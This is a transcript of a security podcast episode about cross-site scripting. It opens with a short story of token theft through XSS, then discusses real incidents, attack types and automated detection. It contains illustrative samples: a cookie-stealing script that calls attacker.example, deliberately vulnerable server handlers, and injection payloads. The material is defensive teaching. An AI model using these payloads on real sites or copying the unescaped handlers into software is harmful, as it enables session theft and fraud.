
Episode 1: Hot Cross-Site Fun

Cross-site scripting (XSS) is one of the oldest web vulnerability types, having been born the day that browsers added scripting support. While sometimes dismissed as a low-risk vulnerability, XSS is still a very real threat that can have serious consequences on the server as well as client side, especially in these days of full-stack JavaScript applications.
 
In this episode, Frank Catucci and Dan Murphy talk about the origins of cross-site scripting, some high-profile attacks, and best practices for testing for and preventing XSS in applications. In the fiction segment, Mallory the hacker uses XSS to inject script into an old and vulnerable leaderboard server—but she has to work hard to get around the WAF first.

Hosted by: Frank Catucci, Dan Murphy
August 20, 2024

Transcript

Episode One: Hot Cross-Site Fun

Mallory didn’t really need the z-bucks—not really. She had found a new game, emerging from the ashes of the old one, more exciting than any she had played before. She had barely touched her tonkotsu ramen. She blinked, looking up from her laptop, and noticed that the noodle bar was almost empty. She’d have to leave soon, but she was so close. She had an idea—one more thing to try. In her experience, it was always the side door that didn’t have the lock.

The server was old, at least a decade back, judging from the hostname. Some sort of public-facing leaderboard for a game long since abandoned—dusty, unloved, and absolutely perfect. She adjusted the angle of her laptop. There was clearly a web application firewall (WAF) between her and her target. It was signature-based, with a library of tricks that it would watch out for and individually block. But if she put the right moves into the URL, jinked left when it went right, she could work around it.

Maybe for the tenth time tonight, she told herself that she should really automate this. She had found that she could reflect the text she typed into the site’s search bar into the source code of the page, but the WAF was already one step ahead, anticipating her and blocking her. Steam no longer rose from the ramen. On a whim, she added an unusual bit of JavaScript—a mouse hover handler that would pop up an alert box. The payload sailed across the net inside her HTTP GET request, and she inhaled sharply, her heart rate spiking.

There, before her in a gray popup, was an alert box containing her attack payload. The onmouseover event had invoked an alert with a string that had no business being in the application she was targeting. Her heart began to pound. The site with the vulnerability wasn’t important, but its domain name was. As a subdomain, it was trusted with access to all of the single sign-on persisted state information—the cookies scoped to the main site.

Shinobi was streaming the game as usual. He had more than 15 million subscribers. She hopped onto his stream and started spamming a URL—a special link that redirected after login to the site with the XSS, the cross-site scripting payload. The chat wouldn’t take the full URL, so she had to finesse it, change a few characters here and there. It was almost too easy to talk the gullible audience into an infinite z-bucks hack. The link contained a script tag with a source pointing back to an EC2 instance that Mallory had set up with a hostile bit of JavaScript—a kind of Trojan horse that, once invited past the walls of the webpage’s secure boundary, could unpack and execute any JavaScript code she wanted. And what she wanted was the OAuth2 credentials—the keys to the social media accounts of everyone watching the stream who was gullible enough to click.

She tailed the logs of her server, looking for the GET requests that included the base64-encoded JSON Web Token (JWT, pronounced “jot”). It worked. It actually worked. The tokens poured in faster than her terminal could keep up with, multiple lines of green text spilling over her darkened screen so fast the characters turned into a blur. She had done it. She had won.

In the real world, the neon lights in the ramen bar turned off, leaving her face illuminated by only the pale glow of the laptop. Her victory still danced in the LED’s back glow. Someone was yelling at her—something about closing in ten minutes. She hadn’t been listening, too wrapped up in her own world. But she had done it. She had solved the game within the game. Her nerves were pure electricity as a huge grin spread across her face.

She had won… chicken dinner.

Dan Murphy: Welcome to our first episode of AppSec Serialized, the podcast where we talk about web application and API security. My name is Dan Murphy, and I’m the Chief Architect here at Invicti Security.

Frank Catucci: And my name is Frank Catucci, and I’m the CTO and Head of Research here at Invicti Security. 

Dan: As you heard in that intro story, cross-site scripting is very, very real, and today we’re going to dive a bit deeper into it. Frank, my first question is, what’s in a name? Why is cross-site scripting (XSS) called cross-site?

Frank: Yeah, it’s an interesting question that has a lot to do with the history of cross-site scripting. This is a vulnerability that goes back a number of years. If you look at how applications and websites were designed in the past, everything essentially happened on one site. Cross-site scripting comes into play when you load something in an iframe or from a different site, or when you run a script via a different site. You’re essentially crossing the boundaries of one site to another to exploit this vulnerability. That’s my take on the history of the name and how it’s evolved to what it is today.

Dan: Yeah, totally. I think the first instances of this, like with the Myspace worm, started a lot of this stuff. Originally, these involved tiny, invisible iframes with scripts that came from another site, from a different origin. Those hostile scripts were able to run on the page and cause a lot of harm.

Frank: Dan, I have a question for you. A lot of people often say, “Oh, it’s just cross-site scripting. I’m not sure it’s still relevant as a severe vulnerability in my web application.” Let’s break this down. What’s the worst thing that can happen with cross-site scripting?

Dan: There are a few different ways to think about it. Cross-site scripting is about evaluating untrusted JavaScript code in the front end of your apps. In terms of your threat model, anything that someone could do through your UI can be achieved if hostile code is executing in the front end. Back in the day, it was easy to say, “Oh, that’s just the UI; it doesn’t matter that much.” But with everything being controlled through a web UI nowadays, anything you can do there can be done by malicious code.

Technically, you’re executing code that has access to the full Document Object Model (DOM). It can rewrite things and exfiltrate data. For example, you could insert a silent image tag that sends your cookies, which are associated with the site, to a hostile third party. That third party could then log in to your site or your banking account and transfer funds. There’s a lot of power in this vulnerability. You can intercept APIs, steal data, and cause significant damage. Code can click buttons, drive processes, and exfiltrate sensitive information.
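For readers following along, a minimal sketch of the silent image-tag exfiltration Dan describes might look like the snippet below. The attacker’s domain is a placeholder, and cookies flagged HttpOnly would not be readable this way.

    <script>
      // Injected payload: build an image whose URL carries the victim's cookies.
      // "attacker.example" is a stand-in for a server the attacker controls.
      var img = new Image();
      img.src = "https://attacker.example/collect?c=" + encodeURIComponent(document.cookie);
      // The browser fires a silent GET request; the cookies land in the attacker's access logs.
    </script>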

In fact, Frank, that’s a good question. What’s your favorite example when you talk to people about cross-site scripting, where damage has been done? 

Frank: We have plenty of examples to choose from. I’ll give you one of my personal favorites due to its impact. I’d love to hear yours as well. 

This is relatively recent, around 2018. British Airways was attacked by Magecart. They exploited a cross-site scripting vulnerability in a JavaScript library used on the British Airways site. With that vulnerability, they were able to send customer data to a malicious server using a domain name that looked like British Airways’ own. They skimmed ticketing, credit card, and personal information from almost 400,000 booking transactions. We’re not talking about one or two; we’re talking about almost 400,000 live customer bookings with credit cards, corporate cards, mile transactions, everything being processed in those ticket purchases before the breach was discovered.

This is a perfect example of how a cross-site scripting vulnerability could be exploited and be detrimental to a company. We’re talking about 400,000 credit cards on a British Airways site, PCI violations, breach notifications, identity monitoring, etc. If this were a smaller entity, it could have ended the company. Super impactful and expensive for the company.

So that was just one example, probably one of my favorites just because of the breadth and depth and impact of the attack. But, Dan, you give me an example—what’s one of your favorite cross-site scripting examples?

Dan: So, one story I always love to talk about, and I’ve used it when interviewing engineers over the years, comes from a security researcher named Sam Curry. Cross-site scripting is ultimately about not having validation. It’s about putting something into a web page that has no business being there. This gentleman got a Tesla, and when you have a Tesla, the app allows you to name your car.

Now, most people are going to name it something innocuous like “Bob the car” or something like that. But in this case, what this guy did was he named it something like <script src="http://my-evil-server.org/js">. Basically, he was trying to pull in some code from somewhere on the internet, and he named it that. Nothing happened at first because it was protected, so he thought nothing of it.

But then, months later, he was driving on the highway and got a crack in his windshield. He used the app to request a replacement, and what happened was the app sent the name of the car—which again was this HTML tag trying to pull in content from another location—through a labyrinth of different paths to a back-end system at Tesla that was processing these claims. Suddenly, he found that his dumb name for his car was being pulled into an internal web page firewalled off in some internal Tesla app. 

What it was doing now was allowing him to inject code from this web server that he controlled into the internal app, and he was able to do anything with access to the DOM. He could see what the app was doing, and it turned out this app was processing geolocation data to show where someone doing a service request would need to drive to replace the windshield on a cracked Tesla. It showed a picture of his car, its location, and he also noticed that because the cross-site scripting was executing in the context of that web page, it was easy to look at the document.location property and see, “Hey, this is for cracked windshield request SL1 123.” 

Well, he was able to change that to 124 and found somebody else’s vehicle, then to 125, and so on. You can extrapolate from there—this simple trick of naming something inside an app with active code ended up allowing him to track the location of every single Model S out there, to see where it was on the map. It’s humorous because the vector is an input that goes into a web app that ends up executing not on a publicly accessible system, but on something in the back that should be secure. There are tons of internal web apps that don’t have the same internal security standards that externally facing systems do, but this one became active, and he was able to get some pretty juicy stuff out of it.

It’s a great story. Are there different types of cross-site scripting? What flavors of that particular vulnerability can I get?

Frank: That’s an excellent question. Some people will say there are a couple of different flavors of cross-site scripting. Some will say there are upwards of three or four types. I break these down into two major categories. One could argue that DOM-based XSS is just a type of reflected rather than stored XSS since it occurs strictly in the DOM. So, I’m going to focus on the two main categories. One would be reflected, and the other would be stored. You’ll often hear these referred to as reflected or non-persistent on one hand, and stored or persistent on the other. But I break it down into these two categories.

Reflected cross-site scripting is when user input is returned by the app, whether in an error message, a search result, or some other response that is rendered in the browser on the DOM side. It’s reflected within that session, and that can have a multitude of impacts. A script that gets replayed or displayed on that application can do things like clicking buttons, creating users, or causing other unintended actions.

Let’s say you’re logged in as an admin, and you’re vulnerable to cross-site scripting. You might not realize it, but you’ve just created a new admin—except it’s a nefarious user. So, there are tons of things that can occur there. That’s basically what I look at beyond the simple alert with JavaScript as a test. But that’s reflected cross-site scripting.
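As a rough illustration of the reflected case, a hypothetical Express handler that echoes a search parameter straight back into the HTML could look like this. It is only a sketch of the pattern Frank describes, not code from any real application.

    // A deliberately vulnerable search endpoint (illustrative only).
    const express = require("express");
    const app = express();

    app.get("/search", (req, res) => {
      const q = req.query.q || "";
      // Vulnerable: user input is concatenated into the response without encoding,
      // so /search?q=<script>alert(1)</script> executes in the victim's browser.
      res.send("<h1>Results for: " + q + "</h1>");
    });

    app.listen(3000);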

The other type is usually more serious, and I sometimes think, “They call this stored XSS, but isn’t this really a type of injection?” Stored XSS is when any nefarious input is stored on the actual host or the site itself. This can be stored anywhere—it could be stored in a database, a comment field, or a review field (which is one of my favorites, right? Let’s leave a review with a payload). 

What happens there is that this vulnerability is not only taking advantage of the user and the session it’s in front of, but it can reach and impact every user or session that visits that database, comment field, or message field. That payload is permanently stored as part of that database and replayed as many times as it’s accessed until it’s removed. In my eyes, this is definitely more impactful as a whole. We could paint that with a few different brushes, but those are the two main categories that I usually use to describe cross-site scripting.
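A stored variant of the same sketch might look like the following: the payload goes into a comment once and is replayed to every visitor until it is removed. Again, this is a hypothetical example rather than code from any real site.

    // A deliberately vulnerable comment board (illustrative only).
    const express = require("express");
    const app = express();
    const comments = []; // stands in for a database table

    app.post("/comments", express.urlencoded({ extended: false }), (req, res) => {
      comments.push(req.body.text); // stored verbatim, with no sanitization or encoding
      res.redirect("/comments");
    });

    app.get("/comments", (req, res) => {
      // Every visitor gets the raw payload back, so one malicious comment
      // affects every future session until the record is deleted.
      res.send(comments.map((c) => "<p>" + c + "</p>").join(""));
    });

    app.listen(3000);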

Dan: That persistent one is tricky, right? Because it spreads. It might be injected through one vector and then affect somebody else. Particularly when you’re dealing with exfiltration or other things like in the story we discussed earlier. That’s an example of persistent XSS.

Frank: Yeah, it’s a perfect example and really shows the impact that XSS can have. One thing we also get asked a lot is, “Look, cross-site scripting occurs. We update our sites and our APIs”—well, not APIs so much in this example—”but we update our web applications, and we update our functionality almost hourly, some daily, some weekly, etc. But there are frequent updates where these kinds of vulnerabilities can sneak in.” 

We have a lot of clients who ask, “How can we automate XSS detection so that it’s constantly being tested and monitored to make sure we’re not having these vulnerabilities in production environments without us knowing?” So, Dan, in your opinion, what are one or two ways that this could be automated in a way that’s not a manual task for someone to find these things and fix them?

Dan: That’s a good question. The answer is, you know, it’s just like three simple for-loops, right? For each website that you have, for each page on that website, and for each parameter on that page, try some XSS. And that’s very reductionist; it doesn’t really work like that in practice, but it’s a good model for understanding this stuff.
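Dan’s “three simple for-loops” model, written out as pseudocode. The helper names here (crawl, sendWithPayload, executesProbe, report) are purely illustrative and not a real scanner API.

    // Reductionist scanner loop: every site, every page, every parameter.
    function scan(websites) {
      for (const site of websites) {
        for (const page of crawl(site)) {
          for (const param of page.parameters) {
            const response = sendWithPayload(page, param, "<script>probe()</script>");
            if (executesProbe(response)) {
              report(site, page, param); // confirmed execution, not just a suspicion
            }
          }
        }
      }
    }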

If you wanted to exploit cross-site scripting manually, there are some great tools out there. There’s the Google Firing Range, and all sorts of test apps that you can use. The simplest version is you find a parameter that says, “This is where you put your name,” and you’re hoping someone just trusted that blindly. You’re hoping that someone took that name parameter from the user and put it into the HTML. 

Much like our Tesla app example from before, say your name was something like <img src=x onerror="someJavascript()">. What an automated test tool is going to do is it’s not going to get tired; it’s going to exhaustively find every single parameter, doing the sort of work that a manual penetration tester would probably get pretty tired of after the 10th value inside a JSON post of some fetch data.

So, they’re not going to look, but an automated tool will go through each of these parameters. What it tries to do is basically send different types of payloads to find different parts of the system, places where you can reflect content into the page. The actual payload you send differs based on where inside the page you’re able to inject traffic. If you’re just raw inside the HTML, you could throw in a script tag, but often it’s more subtle. You might have an injection context where it’s going into the source of an iframe, where you might have to put just a particular URL to an off-site machine that has your payload. Or you might have to close one tag and start something new. So, there are a lot of these different flavors.
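To make the context point concrete, a few illustrative payload shapes for different injection points are shown below. The attacker host is a placeholder, and probe() stands in for whatever the tester actually wants to run.

    Raw HTML context:          <script>probe()</script>
    Inside an attribute value: " onmouseover="probe()
    Inside an iframe src:      https://attacker.example/payload.html
    Breaking out of a tag:     </textarea><script>probe()</script>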

Really, what we do is introduce yet another loop that says for each recipe in the cookbook of different types of attacks, try one of these things. But what’s cool about cross-site scripting is that you can detect it. You can make sure that it’s really being exploited. Most of these automated tools are driving a browser, crawling through every single possible site and page, and at the end of the day, they’re trying to get code to work. 

Because these browsers are instrumented, we can register a function, almost like a smoke detector, that says, “Hey, if you manage to call this bit of JavaScript, it’s an innocuous function that stands in for doing something really nasty.” So instead of stealing all your creds and sending your cookies off to some random site on the internet, we call a function that proves you were able to actually execute your own code. So you have something registered inside there that will only be called if all the stars align and the payload runs for real, and with an instrumented browser, you can detect that you actually triggered it. The nice thing is that you can then report with confidence, saying, “Hey, this is something you really have to take a look at, because it’s not that this could happen, it’s that this did happen.”
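As a rough sketch of that “smoke detector” idea, the instrumented browser could expose a harmless callback before the page loads, and the injected payload simply calls it. The names below are made up for illustration and do not reflect any particular scanner’s API.

    // Registered by the scanner's instrumented browser before the page is loaded.
    window.__xssConfirmed = false;
    window.xssProbe = function (probeId) {
      // Runs only if injected code actually executed inside the target page.
      window.__xssConfirmed = true;
      console.log("XSS execution confirmed for probe " + probeId);
    };

    // The payload injected into the suspect parameter is then simply:
    //   <script>window.xssProbe("search-q-0042")</script>
    // If the flag flips, the scanner can report "this did happen," not just "this could happen."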

Frank: Yeah, and we use benign payloads, but substituting a malicious payload for a benign one is not too difficult.

Dan: Oh yeah, in the real world, people will often exploit these things by doing something like <script>alert(1)</script>. What that does is it pops up a dialog box, but someone can get really excited when they see that pop-up because that’s the stand-in for doing anything you want.

Frank: Yeah, I can basically execute my code on your site and have it do whatever I need it to do. There’s a lot of creativity that comes in there too, right? The creativity of things like using an image source tag or different types of HTML recipes.

Dan: Indeed, we have tons of these things that we’ll go through to try to find out what can get past the filters, what can make its way through, and provably be real XSS.

So, Frank, I think that’s all we have time for today. This is our first episode—hopefully, several more to come. But I just want to say, hey, thanks. It’s always a blast sitting down and talking shop with you.

Frank: You as well, Dan. I always appreciate the conversation.

Dan: Yeah, thanks. And thank you all for listening. Have a great day!

Credits

COMING SOON

Episode 4: Another Code Brick in the Wall

In this episode, Frank Catucci and Dan Murphy go into supply-chain security and look at several high-profile breaches caused by insecure components and dependencies. In the fiction segment, Alice the head dev realizes that the vulnerable library the CISO is asking about is used in lots and lots of places all over the org…

